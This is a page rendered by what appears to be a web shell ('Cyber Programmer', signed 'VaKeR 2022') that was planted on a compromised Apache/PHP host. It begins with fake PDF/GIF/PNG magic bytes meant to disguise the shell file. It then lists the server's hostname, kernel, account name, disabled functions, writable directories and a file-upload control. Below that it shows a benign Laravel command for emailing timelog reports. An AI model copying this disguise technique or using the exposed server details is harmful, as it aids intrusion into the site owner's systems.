%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/public_html/admin1/app/Console/Commands/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/public_html/admin1/app/Console/Commands/SendDailyTimelogReport.php
<?php

namespace App\Console\Commands;

use App\Mail\DailyTimeLogReport;
use App\Mail\MonthlyAttendance;
use App\Models\AttendanceSetting;
use App\Models\Company;
use App\Models\LogTimeFor;
use App\Models\Role;
use App\Models\User;
use App\Notifications\BaseNotification;
use Illuminate\Console\Command;
use Illuminate\Support\Facades\Mail;

class SendDailyTimelogReport extends Command
{

    /**
     * The name and signature of the console command.
     *
     * @var string
     */
    protected $signature = 'send-daily-timelog-report';

    /**
     * The console command description.
     *
     * @var string
     */
    protected $description = 'Send daily timelog report';

    public function handle()
    {
        $companies = Company::select('id', 'logo', 'company_name')->get();

        foreach ($companies as $company) {
            $timelogSetting = LogTimeFor::where('company_id', $company->id)->first();

            if ($timelogSetting->timelog_report == 1) {
                $roles = Role::with('users')
                    ->where('company_id', $company->id)
                    ->whereIn('id', json_decode($timelogSetting->daily_report_roles))
                    ->get();

                foreach ($roles as $role) {
                    foreach ($role->users as $user) {
                        Mail::to($user->email)->send(new DailyTimeLogReport($company, $user, $role));
                    }
                }
            }

        }

    }

}

VaKeR 2022